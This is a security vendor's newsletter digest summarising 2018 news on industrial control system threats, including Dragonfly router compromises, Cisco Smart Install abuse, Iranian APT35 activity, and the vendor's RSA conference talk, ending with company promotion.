The CyberX-Files – Issue #4
Digest of notable ICS cybersecurity content — curated by CyberX’s ICS security geeks
Welcome to the 4th edition of the CyberX-Files. In this issue, we have a number of new stories about Dragonfly (aka Energetic Bear), the Russian threat group that’s targeted energy firms since at least 2013. You’ll also read about why Iran is now perceived as having an “A-Team” of cyberattackers, and why routers are now juicy targets for attackers.
Here at CyberX, we’re continuing our global series of ½-day best practices seminars titled “Emerging ICS/SCADA Threats and How to Maximize Operational Resilience.” In April, we held our second seminar in London featuring CISOs and other executives from Teva Pharmaceuticals, Scotland Gas Networks (now known as SGN), and DXC Technology, a $25B end-to-end IT services company created by the merger of CSC and the Enterprise Services business of Hewlett Packard Enterprise.
Both seminars featured educational presentations and lively conversations about the new ICS threat landscape, why legacy defenses are no longer sufficient, and how to build a unified IT/OT security strategy around the corporate SOC.
In This Newsletter
- Oil & Gas Companies Aren’t Spending As Much as Other Sectors on Cybersecurity
- Dragonfly Compromises Core Router to Attack Critical Infrastructure
- “Don’t Mess With Our Elections”: Vigilante Hackers Strike Russia, Iran
- Russia is Hacking Routers in Global Cyberattacks, US and UK Warn
- Iran ‘the New China’ as a Pervasive Nation-State Hacking Threat
- Responding to a Third Party Cyberattack in Three Steps
- Echoing TRITON, CyberX’s Innovative ICS Security Research Presented at 2018 RSA Conference
ICS/SCADA/OT Security News
- According to this analysis, energy companies spend less than 0.2% of their revenue on cybersecurity — at least a third less than financial institutions.
- At the same time, Symantec is now tracking at least 140 hacking groups targeting the energy industry — up from 87 in 2015 (61% increase).
- The attack surface is also increasing. To lower operating costs, the industry has been adding IIoT sensors to track data and control flows from 900,000 oil and gas wells, and 300,000 miles of pipelines. But according to Matthew Stegall, who performs security assessments for Deloitte & Touche and KPMG, these devices are “fairly wide open from a security perspective” — although he also says that energy companies are now beginning to strengthen their OT security.
- “Air gapping” offers a false sense of protection because it’s fairly easy to pivot from corporate IT networks to OT networks. [This was clearly demonstrated in the recent FBI/DHS alert, which described how Russian threat actors compromised OT networks by stealing remote access credentials from OT personnel.]
- Another challenge is IT/OT silos: the CIO or CISO is responsible for the IT security, while operations staff typically report to a different boss. The result: a communications gap.
- Many energy executives falsely believe the Defense Department or Homeland Security is defending them. But they can’t because the government lacks the capability, expertise and, importantly, the legal standing to defend civilian assets before they’re attacked.
- Dragonfly, a Russian group targeting energy companies that’s been around since at least 2011, became “a lot more aggressive” in 2017. The group has been gaining information on how energy companies work and figuring out how to maintain stealth access on their systems.
- “What our adversaries are really doing is relentlessly probing for weakness than can be exploited down the road for political, economic, and military gain.”
- A core Cisco router used by one of Vietnam’s largest oil rig manufacturers was compromised by Dragonfly so it could be used as a command-and-control server for a phishing attack.
- The stolen credentials were later used to attempt to penetrate energy companies in the UK last March.
- The phishing attack used a technique called template injection, which silently harvest credentials by attaching documents that automatically connect to an external SMB server controlled by the attackers (using the “Redirect to SMB” feature built into Windows), which then installs malware on the victim’s machine. Unlike common phishing attacks, the documents themselves do not contain malicious macros.
- The same technique was described in the recent FBI/DHS alert about Russian threat actors compromising US critical infrastructure. In both cases, fictitious resumes were used as attachments.
- The use of compromised routing infrastructure for command-and-control purposes is not new, but its detection is relatively rare. That’s because the compromise of a router very likely implicates the router’s firmware and there aren’t as many forensic tools available to investigate them. Analysis is further challenged by the lack of system logs.
- Additionally, vulnerabilities in core infrastructure like routers are not easily closed or remediated.
- The article also notes that, since 2013 and perhaps earlier, Dragonfly has been targeting energy companies in diverse geographies including Kazakhstan, Ireland, Turkey, the UK, and the US.
- A group of hackers targeted Cisco routers at ISPs, data centers, and websites in Russia and Iran.
- In addition to disabling the equipment, the hackers left a note on affected machines: “Don’t mess with our elections,” along with an image of an American flag.
- The Iranian news agency said the attack affected 200,000 router switches across the world, including 3,500 switches in Iran.
- “We were tired of attacks from government-backed hackers on the United States and other countries,” someone in control of an email address left in the note told Motherboard. “We simply wanted to send a message.” The group was later identified as calling itself “JHT.”
- The attack exploited a vulnerability in a legacy utility called the Cisco Smart Install Client, which was designed to allow no-touch installation of new Cisco switches. The SMI protocol allows an unauthenticated, remote attacker to modify the switch’s TFTP server setting, exfiltrate and modify configuration files, replace the IOS image, and execute high-privilege CLI commands on switches.
- Using Shodan, Talos found 168,000 systems potentially exposed to this vulnerability.
- The hackers claimed to have fixed the Cisco issue on exposed devices in the US and UK “to prevent further attacks.”
- Talos considers this activity a response to a March alert from the FBI/DHS, which said Russian government hackers were targeting energy and other critical infrastructure sectors.
- In mid-April, the U.S. and U.K. teamed up to issue an unprecedented joint warning about state-sponsored Russian cyber actors targeting network infrastructure devices.
- The alert states: “Organizations that use legacy, unencrypted protocols to manage hosts and services, make successful credential harvesting easy for these actors. An actor controlling a router between ICS-SCADA sensors and controllers in a critical infrastructure—such as the Energy Sector—can manipulate the messages, creating dangerous configurations that could lead to loss of service or physical destruction. Whoever controls the routing infrastructure of a network essentially controls the data flowing through the network.”
- Russian attackers have been using the Smart Install Exploitation Tool (SIET), which has been online since November 2016. But they’re also exploiting other legacy protocols including Telnet, GRE, and SNMP.
- Russian actors have conducted both broad-scale and targeted scanning of Internet address spaces, allowing them to identify Internet-facing ports and services, conduct device fingerprinting, and discover vulnerable network infrastructure devices.
- They can abuse security gaps to harvest login credentials, map internal network architectures, modify device firmware, and copy or redirect victim traffic through Russian-controlled infrastructure.
- The alert was a joint effort by the US FBI and DHS, along with the UK’s National Cyber Security Centre (NCSC).
- Mandiant investigated a cyberattack by the hacker group APT35 that targeted an energy company.
- APT35 infected the target via a spear phishing email which compromised the victim’s VPN credentials.
- The attackers also compromised the organization’s Outlook Web Access (OWA) portal so they could read emails and steal data on Middle East organizations, that they later targeted in data-destruction attacks.
- The median dwell time from compromise to discovery is now at 101 days — around 3 ½ months — up from 99 days in 2016.
CyberX In The News
Wall Street Journal
After a cyberattack hit the natural gas industry communications system vendor Energy Services Group LLC in April, one of its customers was able to quickly shift over to an internal system to maintain operations. The incident offers a lesson in how companies can respond in three steps when a vendor or partner is compromised.
Research & Technology News
CyberX Press Release
- At the 2018 RSA Conference, CyberX VP of Research David Atch presented the session Mind the Air-Gap: Exfiltrating ICS Data via AM Radios and Hacked PLC Code as part of the “Hackers and Threats — Advanced” track.
- CyberX became the first ICS behavioral anomaly detection platform vendor to demonstrate an ICS/SCADA exploit at RSA, one of the world’s premier cybersecurity conferences. Speaking positions at the RSA Conference are highly competitive, with thousands of submissions for only a few hundred speaking positions.
- During his session, David discussed a novel attack technique that stealthily injects rogue ladder logic code into PLCs without interrupting their normal operation. This approach is similar to the TRITON attack on the petrochemical facility in Saudi Arabia, in which attackers injected malicious code into a Triconex Safety Instrumented Controller (SIS) — with the likely goal of triggering an explosion that would cause catastrophic physical and environmental damage and potentially loss of human life.
- This innovative method also helps shatter the myth of air-gapped ICS networks, which are theoretically isolated from corporate IT networks and the outside world. In the CyberX hack, the rogue ladder logic code has been specially crafted to generate encoded radio signals that are received by ordinary AM radios, enabling adversaries to exfiltrate sensitive IP such as proprietary formulas and recipes — or reconnaissance data about deployed ICS/SCADA devices to aid in planning future destructive attacks.
Founded by military cyber-experts with nation-state expertise defending critical infrastructure, CyberX provides the most widely-deployed platform for continuously reducing ICS and IIoT risk.
Our ICS-specific self-learning engine delivers accurate insights about assets, targeted attacks, malware, vulnerabilities, and attack vectors — in less than an hour — without relying on rules or signatures, specialized skills, or prior knowledge of the environment.
CyberX is a member of the IBM Security App Exchange Community and has partnered with premier solution providers worldwide including Optiv Security and Deutsche-Telekom/T-Systems.
To see CyberX’s OT security platform in action, request a demo here.